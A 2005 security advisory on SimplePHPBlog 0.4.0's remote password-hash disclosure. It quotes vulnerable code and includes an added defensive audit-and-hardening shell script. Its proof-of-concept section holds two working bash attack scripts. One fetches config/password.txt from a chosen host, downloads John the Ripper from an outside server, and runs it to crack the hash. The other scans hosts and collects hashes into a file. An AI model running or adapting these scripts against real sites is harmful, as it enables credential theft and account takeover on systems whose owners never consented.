
SimplePHPBlog 0.4.0 <= Remote Password Disclosure



           __       .__
______    |__|_____ |  | ___.__.
\____ \   |  \____ \|  |<   |  |
|  |_> >  |  |  |_> >  |_\___  |
|   __/\__|  |   __/|____/ ____|
|__|  \______|__|        \/        Where is the security? ...

Security Advisory 2005-0x00

Authors......... pjphem && LazyCrs
Date............ 07/07/2005
Vendor.......... www.simplephpblog.com
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure



o The Problem:
--------------


bash-3.00# cat install02.php

$result = create_folder( 'config' );

bash-3.00# cat sb_login.php

                // If there's no password file then need to redirect them.
                $passFile = 'config/password.txt';

                
----------------------------------------------------------------------------------------

                function create_password ( $user, $pass ) {
                // Generate and store password hash

                $mypasswd = $user.$pass;
                $hashed = crypt($mypasswd);

                // Save File
                $filename = 'config/password.txt';
                $result = sb_write_file( $filename, $hashed );

                 
----------------------------------------------------------------------------------------

                function check_password ( $user, $pass ) {
                // Check password against hashed password file

                $passFile = 'config/password.txt';
                $hashed = sb_read_file( $passFile );


bash-3.00# ls -l `pwd` |grep config
drwxrwxrwx   2 www-data www-data   216 Jul  7 01:13 config
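
What the excerpts show: the installer creates config/ inside the web root, create_password() and check_password() both keep the crypt() hash in config/password.txt, the directory ends up mode 0777, and nothing tells the web server not to serve that file, so any HTTP client can fetch the hash. The script below is an added example, not the advisory authors' or the vendor's code: a POSIX sh audit/hardening pair run against a constructed copy of that layout (placeholder hash; assumes Apache with AllowOverride permitting .htaccess in config/).

```sh
#!/bin/sh
# Added example (not the advisory's or vendor's code): audit and harden the
# config/ directory that SimplePHPBlog creates for password.txt.

# Recreate the layout the advisory shows: config/ under the web root, mode
# 0777, holding the crypt() hash (constructed placeholder) world-readable.
make_vulnerable_layout() {
    mkdir -p "$1/config"
    printf '%s\n' 'CONSTRUCTED_HASH_PLACEHOLDER' > "$1/config/password.txt"
    chmod 0777 "$1/config"                # matches the drwxrwxrwx listing
    chmod 0666 "$1/config/password.txt"
}

# Print each finding; return 0 only when config/ is locked down.
audit_config_dir() {
    dir="$1/config"; bad=0
    # World-writable: any local user can drop in a hash they know.
    if [ -n "$(find "$dir" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
        echo "finding: $dir is world-writable"; bad=1
    fi
    # World-readable: any local user can copy the hash and crack it offline.
    if [ -n "$(find "$dir/password.txt" -perm -0004 2>/dev/null)" ]; then
        echo "finding: $dir/password.txt is world-readable"; bad=1
    fi
    # No deny rule: the web server hands the file to any HTTP client, which
    # is the remote disclosure this advisory is about.
    if ! grep -qs 'Require all denied' "$dir/.htaccess"; then
        echo "finding: no .htaccess deny rule in $dir"; bad=1
    fi
    return $bad
}

# Tighten modes (www-data owns config/, so the application keeps access) and
# block HTTP access. Assumes Apache honours .htaccess here (AllowOverride);
# moving the file outside the document root would be the stronger fix.
harden_config_dir() {
    dir="$1/config"
    chmod 0700 "$dir"
    chmod 0600 "$dir/password.txt"
    cat > "$dir/.htaccess" <<'EOF'
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
EOF
}
```

After sourcing the file, `audit_config_dir /path/to/blog` reports findings and `harden_config_dir /path/to/blog` applies the fixes; the audit only passes once all three checks are clean.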


o Proof of concept:
-------------------

bash-3.00$ cat 0xfuck-phpblog.sh
#!/bin/bash
###################################################################
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure.  (for dummy)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# (C) COPYRIGHT 0xpjply security guru group, 2005
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
###################################################################
# contact:
#                  pjphem && LazyCrs
#
#         pjphem@xxxxxxxx && fLazyCrs@xxxxxxxxx
#
#Greetz:
#
#      You think you know?  You have no idea!
#                                             fluffi-
#
#
#
#                                                       RAFA FREE
#
###################################################################
echo ""
echo ""
echo "      +++++++++++++++++++++++++++++++++++++++++++++++++++++++++    "
echo "    =: SimplePHPBlog Remote Password Disclosure. - for dummy   :=   "
echo "      +++++++++++++++++++++++++++++++++++++++++++++++++++++++++    "
echo ""
echo "         c0de by pjphem  "
echo ""
echo ""
echo "           vulnerabili Simple php blog  0.4.4 <= "
echo ""
echo ""
echo -n "inserisci un hostname: " ; read hostname ;
echo -n "inserisci dir: " ; read dir ;
echo ""
echo "[*] praparando l'ambiente..."
mkdir 0xpjply
cd 0xpjply
echo "[*] OK!"
echo "[*] Cattura password..."
wget http://$hostname/$dir/config/password.txt
echo "[*] OK!"
echo ""
echo ""
echo "Show password: (md5)"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Downloading John The Ripper (password decripter) ??  [Y/n] "
read Q
if [ $Q = y ];
    then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz
else
    exit 1;
 fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[*] Dowloading password.."
echo ""
wget http://$hostname/$dir/config/password.txt
echo ""
echo "Done!"
echo ""
echo "STARING John for decript password.. enJoy"
./john password.txt
echo ""
echo ""
bash-3.00$




bash-3.00$ cat 0xfuck-phpblog-scanner.sh
#!/bin/bash
#
# Simple tester for phpblog
#
#     phpblog  0.4.4 <=
#
#######################################
echo "host , directory blog: (ex. test.it blog)"
read HOST BLOG
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3
bash-3.00$



